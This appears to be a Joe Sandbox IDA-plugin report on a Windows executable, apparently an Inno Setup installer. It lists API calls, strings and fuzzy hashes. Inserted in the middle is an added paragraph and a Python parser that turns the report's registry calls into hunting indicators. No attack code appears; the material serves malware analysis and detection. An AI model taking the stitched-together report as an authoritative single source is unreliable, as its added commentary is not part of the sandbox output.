                                                              • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                              • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                              • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                              APIs
                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                              Strings
                                                              • Inno Setup: Setup Version, xrefs: 0046EE65
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: Inno Setup: Setup Version
                                                              • API String ID: 3702945584-4166306022
                                                              • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                              • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                              • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                              • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                              APIs
                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                              Strings
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: NoModify
                                                              • API String ID: 3702945584-1699962838
                                                              • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                              • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                              • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                              • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
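The registry calls listed above are the fingerprint of an Inno Setup installer writing its Uninstall entry: RegOpenKeyExA on HKLM (first argument 80000002) with a Software\Microsoft\Windows\CurrentVersion xref, then RegSetValueExA for the value names "Inno Setup: Setup Version" and "NoModify", with "_is1" (the suffix Inno Setup appends to its Uninstall key name) visible in the trailing stack slots. Joe Sandbox prints more slots than the API takes (RegSetValueExA has six parameters; sixteen entries are listed), so everything past the parameter count is caller-frame residue, not an argument. The following Python is an added example, not code from the Joe Sandbox report: it parses API-list lines in this report's format and extracts the registry operations as hunting indicators. The sample lines are copied from the entries above; the HKEY handle mapping, the per-API parameter counts and the "Inno Setup uninstall key" heuristic are assumptions of the example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Sample input: API-list lines copied from the report entries above (Joe Sandbox IDA plugin format).
SAMPLE_LINES = r"""
• SetActiveWindow.USER32(?), ref: 0046A02D
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
• GetCurrentThreadId.KERNEL32 ref: 0041EEF3
• CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
"""

# One entry per line: optional "Part of subcall function XXXXXXXX: ", then API.MODULE,
# an optional "(slot,slot,...)" list, and the call-site address after "ref:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)

# Predefined HKEY handles as they appear in RegOpenKeyEx's first slot
# (assumption: the report prints them as plain 8-digit hex).
ROOT_KEYS: Dict[str, str] = {
    "80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU",
}

# Nominal parameter counts (assumption); slots listed beyond these are caller-frame residue.
PARAM_COUNT = {"RegOpenKeyExA": 5, "RegSetValueExA": 6, "RegCloseKey": 1, "CreateProcessA": 10}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)   # every slot as printed, in order
    ref: str = ""                                    # call-site address
    subcall_of: Optional[str] = None                 # subroutine the call was attributed to

    def params(self) -> List[str]:
        """Only the slots that are real parameters of the API (when the count is known)."""
        n = PARAM_COUNT.get(self.api)
        return self.args if n is None else self.args[:n]

    def residue(self) -> List[str]:
        """Stack slots listed past the API's parameter count (return addresses, nearby strings)."""
        n = PARAM_COUNT.get(self.api)
        return [] if n is None else self.args[n:]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API-list line; headers such as "APIs"/"Strings" and other text are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = raw.split(",") if raw is not None else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def registry_indicators(calls: List[ApiCall]) -> List[Dict[str, object]]:
    """Turn registry opens and writes into hunting indicators. The Inno Setup flag (a value
    name starting with "Inno Setup", or "_is1" left on the stack) is this example's heuristic."""
    out: List[Dict[str, object]] = []
    for c in calls:
        if c.api in ("RegOpenKeyExA", "RegOpenKeyExW") and len(c.args) >= 2:
            root = ROOT_KEYS.get(c.args[0], c.args[0])
            out.append({"op": "open", "path": f"{root}\\{c.args[1]}", "ref": c.ref})
        elif c.api in ("RegSetValueExA", "RegSetValueExW") and len(c.args) >= 2:
            name = c.args[1]
            out.append({
                "op": "set",
                "value": name,
                "inno_uninstall_key": name.startswith("Inno Setup") or "_is1" in c.residue(),
                "ref": c.ref,
            })
    return out


if __name__ == "__main__":
    for ind in registry_indicators(parse_api_lines(SAMPLE_LINES)):
        print(ind)
```

Run on the sample, the parser yields seven calls and three registry indicators: the HKLM open of System\CurrentControlSet\Control\Windows and the two value writes, both flagged as Inno Setup uninstall-key activity. Because the `_is1` marker is only found in the residue slots, the split between `params()` and `residue()` matters: treating the whole list as arguments would misattribute return addresses to the API.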
                                                              APIs
                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                              • SendNotifyMessageA.USER32(00010452,00000496,00002711,-00000001), ref: 0047E6BA
                                                              Similarity
                                                              • API ID: EnumFontsMessageNotifyReleaseSend
                                                              • String ID:
                                                              • API String ID: 2649214853-0
                                                              • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                              • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                              • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                              • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                              Strings
                                                              Similarity
                                                              • API ID: ByteCharMetricsMultiSystemWide
                                                              • String ID: /G
                                                              • API String ID: 224039744-2088674125
                                                              • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                              • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                              • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                              • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                              APIs
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                              • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                              Similarity
                                                              • API ID: CloseEnum
                                                              • String ID:
                                                              • API String ID: 2818636725-0
                                                              • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                              • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                              • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                              • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                              Similarity
                                                              • API ID: CreateErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 2919029540-0
                                                              • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                              • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                              • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                              • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                              APIs
                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                              Similarity
                                                              • API ID: Resource$FindFree
                                                              • String ID:
                                                              • API String ID: 4097029671-0
                                                              • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                              • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                              • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                              • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                              • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                              Similarity
                                                              • API ID: Thread$CurrentEnumWindows
                                                              • String ID:
                                                              • API String ID: 2396873506-0
                                                              APIs
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                              Similarity
                                                              • API ID: ErrorFileLastMove
                                                              • String ID:
                                                              • API String ID: 55378915-0
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              APIs
                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                              • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                              Similarity
                                                              • API ID: CursorLoad
                                                              • String ID:
                                                              • API String ID: 3238433803-0
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              Similarity
                                                              • API ID: ErrorLibraryLoadMode
                                                              • String ID:
                                                              • API String ID: 2987862817-0
                                                              APIs
                                                              • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                              • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                              Similarity
                                                              • API ID: FolderFreeKnownPathTask
                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                              • API String ID: 969438705-544719455
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                              • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Global$AllocLock
                                                              • String ID:
                                                              • API String ID: 15508794-0
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                              Similarity
                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                              • String ID:
                                                              • API String ID: 1658689577-0
                                                              APIs
                                                              • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                              Similarity
                                                              • API ID: InfoScroll
                                                              • String ID:
                                                              • API String ID: 629608716-0
                                                              APIs
                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                              • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                              Similarity
                                                              • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                              • String ID:
                                                              • API String ID: 3319771486-0
                                                              APIs
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              APIs
                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                              Similarity
                                                              • API ID: FormatMessage
                                                              • String ID:
                                                              • API String ID: 1306739567-0
                                                              APIs
                                                              • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                              Similarity
                                                              • API ID: ExtentPointText
                                                              • String ID:
                                                              • API String ID: 566491939-0
                                                              APIs
                                                              • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              APIs
                                                              • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              APIs
                                                              • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              APIs
                                                                • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                              • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                              Similarity
                                                              • API ID: InfoParametersSystem$ShowWindow
                                                              • String ID:
                                                              • API String ID: 3202724764-0
                                                              APIs
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID:
                                                              • API String ID: 530164218-0
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                              • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                              Similarity
                                                              • API ID: ErrorFileLast
                                                              • String ID:
                                                              • API String ID: 734332943-0
                                                              APIs
                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              APIs
                                                              Similarity
                                                              • API ID: DestroyWindow
                                                              • String ID:
                                                              • API String ID: 3375834691-0
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001CA0,00005CA3,00401973), ref: 00401766
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              APIs
                                                              • LocalAlloc.KERNEL32(00000000,00000644,?,0049B450,004013A3,?,?,00401443,?,?,?,00001CA0,00005CA3,00401983), ref: 00401353
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              APIs
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                              • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                              • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                              • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                              • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                              • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                              • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                              • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                              • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                              • API String ID: 2323315520-3614243559
                                                              • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                              • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                              • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                              • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 0045862F
                                                              • QueryPerformanceCounter.KERNEL32(021E3858,00000000,004588C2,?,?,021E3858,00000000,?,00458FBE,?,021E3858,00000000), ref: 00458638
                                                              • GetSystemTimeAsFileTime.KERNEL32(021E3858,021E3858), ref: 00458642
                                                              • GetCurrentProcessId.KERNEL32(?,021E3858,00000000,004588C2,?,?,021E3858,00000000,?,00458FBE,?,021E3858,00000000), ref: 0045864B
                                                              • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021E3858,021E3858), ref: 004586CF
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                              • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                              • API String ID: 770386003-3271284199
                                                              • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                              • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
